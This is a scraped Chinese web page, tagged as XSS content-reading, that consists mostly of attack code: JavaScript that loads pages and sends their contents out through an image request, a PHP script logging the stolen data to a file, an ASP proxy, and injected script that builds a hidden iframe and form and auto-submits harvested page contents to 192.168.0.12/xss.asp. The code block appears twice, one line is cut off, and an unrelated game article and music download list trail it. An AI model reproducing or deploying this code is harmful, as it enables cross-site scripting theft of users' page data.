无为清净楼资源网 Design By www.qnjia.com
js:
复制代码 代码如下:
document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";
for (x in mycars )
{
if(document.body.startDownload(mycars[x],GetData)){
GetData(source);
}
}
function GetData(source)
{
txt=escape(source);
getReaded(txt);
}
function getReaded(usr) {
var newimg = new Image();
newimg.src="/UploadFiles/2021-04-02/style.php?key=">}
php:
复制代码 代码如下:
<?php
header('Content-Type:text/html;charset=GB2312');
function unescape($str) {
$str = rawurldecode($str);
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r);
$ar = $r[0];
foreach($ar as $k=>$v) {
if(substr($v,0,2) == "%u")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
elseif(substr($v,0,3) == "&#x")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
elseif(substr($v,0,2) == "&#") {
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
}
}
return join("",$ar);
}
$file="news.html";
$_GET['key']=unescape($_GET['key']);
fputs(fopen($file,'a+'),$_GET['key']);
?>
=================================================以下通用了===============
复制代码 代码如下:
<%
Response.Buffer = True
Dim sUrlB,send(2)
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm"))
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm"))
function PageWebProxy(xmlpath)
Dim i, re, Url, Html
Url = xmlpath
Set re = New RegExp
re.IgnoreCase = True
re.Global = True
sUrlB = Url
Html = getHTTPPage(Url)
Url = Left(Url, InStrRev(Url, "/"))
i = InStr(sUrlB, "?")
If i > 0 Then
sUrlB = Left(sUrlB, i - 1)
End If
re.Pattern = "(href|action)=(\'|"")?(\?)"
Html = re.Replace(Html,"$1=$2" & sUrlB & "?")
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1x=$2$3$2")
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1x($2$3$2)")
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2" & Url & "$3$2")
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2")
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2")
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2" & Url & "$3$2)")
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)")
Html = Replace(Html, "&", "%26")
If Split(Url, "/")(2) = "club.isso.com.cn" Then
Html = Replace(Html, "%26amp;", "%26")
Else
Html = Replace(Html, "%26amp;", "&")
End If
Html = Replace(Html, "%26nbsp;", " ")
Html = Replace(Html, "%26lt;", "<")
Html = Replace(Html, "%26gt;", ">")
Html = Replace(Html, "%26quot;", """)
Html = Replace(Html, "%26copy;", "©")
Html = Replace(Html, "%26reg;", "®")
Html = Replace(Html, "%26raquo;", "»")
Html = Replace(Html, "%26%26", "&&")
Html = Replace(Html, "%26#", "&#")
' Html = Replace(Html, "%26", "")
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2$3$2")
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))"
Html = re.Replace(Html,"?url=$1")
re.Pattern = "\?url=" & Url & "(#|javascript:)"
Html = re.Replace(Html,"$1")
re.Pattern = "multipart\/form-data"
Html = re.Replace(Html,"")
PageWebProxy=Html
End function
Function getHTTPPage(url)
Dim Http, theStr, fileExt
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If Request.Form.Count > 0 Then
For Each x In Request.Form
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&"
Next
Http.Open "POST", url, False
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http.Send(theStr)
Else
Http.Open "GET", url, False
Http.Send()
End If
If Http.readystate<>4 then Exit Function
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1))
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responseBody
Response.End()
Else
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1)
Response.BinaryWrite Http.responseBody
Response.Flush
Else
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function BytesToBstr(body,Cset)
Dim objstream
Set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = nothing
End Function
%>
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>")
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>");
document.writeln("<input id=var name=var type=hidden>");
document.writeln("<input id=vartwo name=vartwo type=hidden>");
document.writeln("<input type=submit style=display:none>");
document.writeln("<\/form>")
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>');
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>');
document.getElementById("form").submit();
复制代码 代码如下:
document.body.addBehavior("#default#Download");
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";
for (x in mycars )
{
if(document.body.startDownload(mycars[x],GetData)){
GetData(source);
}
}
function GetData(source)
{
txt=escape(source);
getReaded(txt);
}
function getReaded(usr) {
var newimg = new Image();
newimg.src="/UploadFiles/2021-04-02/style.php?key=">}
php:
复制代码 代码如下:
<?php
header('Content-Type:text/html;charset=GB2312');
function unescape($str) {
$str = rawurldecode($str);
preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U",$str,$r);
$ar = $r[0];
foreach($ar as $k=>$v) {
if(substr($v,0,2) == "%u")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,-4)));
elseif(substr($v,0,3) == "&#x")
$ar[$k] = iconv("UCS-2","UTF-8",pack("H4",substr($v,3,-1)));
elseif(substr($v,0,2) == "&#") {
$ar[$k] = iconv("UCS-2","UTF-8",pack("n",substr($v,2,-1)));
}
}
return join("",$ar);
}
$file="news.html";
$_GET['key']=unescape($_GET['key']);
fputs(fopen($file,'a+'),$_GET['key']);
?>
=================================================以下通用了===============
复制代码 代码如下:
<%
Response.Buffer = True
Dim sUrlB,send(2)
send(0)=escape(PageWebProxy("http://192.168.0.5/sohu.htm"))
send(1)=escape(PageWebProxy("http://192.168.0.5/c.htm"))
function PageWebProxy(xmlpath)
Dim i, re, Url, Html
Url = xmlpath
Set re = New RegExp
re.IgnoreCase = True
re.Global = True
sUrlB = Url
Html = getHTTPPage(Url)
Url = Left(Url, InStrRev(Url, "/"))
i = InStr(sUrlB, "?")
If i > 0 Then
sUrlB = Left(sUrlB, i - 1)
End If
re.Pattern = "(href|action)=(\'|"")?(\?)"
Html = re.Replace(Html,"$1=$2" & sUrlB & "?")
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1x=$2$3$2")
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1x($2$3$2)")
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2" & Url & "$3$2")
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2")
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2")
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2" & Url & "$3$2)")
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)")
Html = Replace(Html, "&", "%26")
If Split(Url, "/")(2) = "club.isso.com.cn" Then
Html = Replace(Html, "%26amp;", "%26")
Else
Html = Replace(Html, "%26amp;", "&")
End If
Html = Replace(Html, "%26nbsp;", " ")
Html = Replace(Html, "%26lt;", "<")
Html = Replace(Html, "%26gt;", ">")
Html = Replace(Html, "%26quot;", """)
Html = Replace(Html, "%26copy;", "©")
Html = Replace(Html, "%26reg;", "®")
Html = Replace(Html, "%26raquo;", "»")
Html = Replace(Html, "%26%26", "&&")
Html = Replace(Html, "%26#", "&#")
' Html = Replace(Html, "%26", "")
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2$3$2")
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)" '"(gif|jpg|bmp|png))"
Html = re.Replace(Html,"?url=$1")
re.Pattern = "\?url=" & Url & "(#|javascript:)"
Html = re.Replace(Html,"$1")
re.Pattern = "multipart\/form-data"
Html = re.Replace(Html,"")
PageWebProxy=Html
End function
Function getHTTPPage(url)
Dim Http, theStr, fileExt
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If Request.Form.Count > 0 Then
For Each x In Request.Form
theStr = theStr & Server.UrlEncode(x) & "=" & Server.UrlEncode(Request.Form(x)) & "&"
Next
Http.Open "POST", url, False
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
Http.Send(theStr)
Else
Http.Open "GET", url, False
Http.Send()
End If
If Http.readystate<>4 then Exit Function
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1))
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then
Response.Clear
Response.BinaryWrite Http.responseBody
Response.End()
Else
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1)
Response.BinaryWrite Http.responseBody
Response.Flush
Else
getHTTPPage = bytesToBSTR(Http.responseBody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function BytesToBstr(body,Cset)
Dim objstream
Set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = nothing
End Function
%>
document.writeln("<iframe name=\"mimi\" src=about:blank style=display:none><\/iframe>")
document.writeln("<form id=form action=http:\/\/192.168.0.12\/xss.asp method=POST target=mimi>");
document.writeln("<input id=var name=var type=hidden>");
document.writeln("<input id=vartwo name=vartwo type=hidden>");
document.writeln("<input type=submit style=display:none>");
document.writeln("<\/form>")
document.getElementById("var").value ='http://192.168.0.5/sohu.htm'+unescape('<%=send(0)%>');
document.getElementById("vartwo").value ='http://192.168.0.5/c.htm'+unescape('<%=send(1)%>');
document.getElementById("form").submit();
标签:
xss,内容读取
无为清净楼资源网 Design By www.qnjia.com
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
无为清净楼资源网 Design By www.qnjia.com
暂无评论...
《魔兽世界》大逃杀!60人新游玩模式《强袭风暴》3月21日上线
暴雪近日发布了《魔兽世界》10.2.6 更新内容,新游玩模式《强袭风暴》即将于3月21 日在亚服上线,届时玩家将前往阿拉希高地展开一场 60 人大逃杀对战。
艾泽拉斯的冒险者已经征服了艾泽拉斯的大地及遥远的彼岸。他们在对抗世界上最致命的敌人时展现出过人的手腕,并且成功阻止终结宇宙等级的威胁。当他们在为即将于《魔兽世界》资料片《地心之战》中来袭的萨拉塔斯势力做战斗准备时,他们还需要在熟悉的阿拉希高地面对一个全新的敌人──那就是彼此。在《巨龙崛起》10.2.6 更新的《强袭风暴》中,玩家将会进入一个全新的海盗主题大逃杀式限时活动,其中包含极高的风险和史诗级的奖励。
《强袭风暴》不是普通的战场,作为一个独立于主游戏之外的活动,玩家可以用大逃杀的风格来体验《魔兽世界》,不分职业、不分装备(除了你在赛局中捡到的),光是技巧和战略的强弱之分就能决定出谁才是能坚持到最后的赢家。本次活动将会开放单人和双人模式,玩家在加入海盗主题的预赛大厅区域前,可以从强袭风暴角色画面新增好友。游玩游戏将可以累计名望轨迹,《巨龙崛起》和《魔兽世界:巫妖王之怒 经典版》的玩家都可以获得奖励。
更新日志
2024年10月06日
2024年10月06日
- 群星《前途海量 电影原声专辑》[FLAC/分轨][227.78MB]
- 张信哲.1992-知道新曲与精丫巨石】【WAV+CUE】
- 王翠玲.1995-ANGEL【新艺宝】【WAV+CUE】
- 景冈山.1996-我的眼里只有你【大地唱片】【WAV+CUE】
- 群星《八戒 电影原声带》[320K/MP3][188.97MB]
- 群星《我的阿勒泰 影视原声带》[320K/MP3][139.47MB]
- 纪钧瀚《胎教古典音乐 钢琴与大提琴的沉浸时光》[320K/MP3][148.91MB]
- 刘雅丽.2001-丽花皇后·EMI精选王【EMI百代】【FLAC分轨】
- 齐秦.1994-黄金十年1981-1990CHINA.TOUR.LIVE精丫上华】【WAV+CUE】
- 群星.2008-本色·百代音乐人创作专辑【EMI百代】【WAV+CUE】
- 群星.2001-同步过冬AVCD【环球】【WAV+CUE】
- 群星.2020-同步过冬2020冀待晴空【环球】【WAV+CUE】
- 沈雁.1986-四季(2012梦田复刻版)【白云唱片】【WAV+CUE】
- 纪钧瀚《胎教古典音乐 钢琴与大提琴的沉浸时光》[FLAC/分轨][257.88MB]
- 《国语老歌 怀旧篇 3CD》[WAV/分轨][1.6GB]